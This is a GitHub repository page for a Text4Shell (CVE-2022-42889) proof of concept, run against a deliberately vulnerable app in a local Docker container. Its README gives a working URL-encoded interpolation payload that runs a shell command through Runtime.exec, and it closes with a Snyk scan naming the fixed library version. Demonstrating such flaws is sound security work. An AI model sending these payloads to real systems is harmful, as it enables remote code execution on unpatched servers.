Skip to content
/ CVE-2022-42889-PoC Public

CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept

2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

sunnyvale-it/CVE-2022-42889-PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
img
img
 
 
src/main/java/it/sunnyvale/text4shell
src/main/java/it/sunnyvale/text4shell
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept

image

Text4Shell is the popular name of a critical software vulnerability discovered in the Apache Commons Text library (see CVE-2022-42889).

This repo is meant to demonstrate a Remote Code Execution (RCE) that leverages this CVE.

The vulnerable code is being used in a SpringBoot controller but don't get confused, this IS NOT a SpringBoot/Spring security issue.

Before testing the RCE, build the Docker image:

$ docker build -t text4shell .
...
 => exporting to image                                                                                                                                                                                     0.0s
 => => exporting layers                                                                                                                                                                                    0.0s
 => => writing image sha256:5d82feaa030f5e7b35c1c6deaa12b40ef713c05001a41f5f71fff6174513507f                                                                                                               0.0s
 => => naming to docker.io/library/text4shell

Then run the container:

$ docker run --name text4shell --rm -ti  -p:8080:8080 text4shell
...
2022-11-05 09:11:03.798  INFO 1 --- [           main] it.sunnyvale.text4shell.Main             : Started Main in 1.376 seconds (JVM running for 1.713)

You can finally try to exploit the vulnerable application with a special crafted URL:

$ curl http://localhost:8080/text4shell/attack\?search\=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Fp0wned%27%29%7D
Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/p0wned')}%

If you find a file named p0wned in the container's /tmp directory, the RCE executed successfully.

$ docker exec text4shell ls -l /tmp/p0wned
-rw-r--r--    1 root     root             0 Nov  5 09:17 /tmp/p0wned

Scanning the image using Snyk, the vulnerable library is detected:

$ docker scan text4shell | grep text
Testing text4shell...
Project name:      docker-image|text4shell
Docker image:      text4shell
Testing text4shell...
Upgrade org.apache.commons:[email protected] to org.apache.commons:[email protected] to fix
✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:[email protected]
introduced by org.apache.commons:[email protected]
Upgrade org.springframework:[email protected] to org.springframework:[email protected] to fix
✗ Improper Handling of Case Sensitivity [Low Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634] in org.springframework:[email protected]
introduced by org.springframework:[email protected]
Project name:      text4shell:latest:/app
Docker image:      text4shell

About

CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept

Resources

Readme
Activity
Custom properties

Stars

2 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages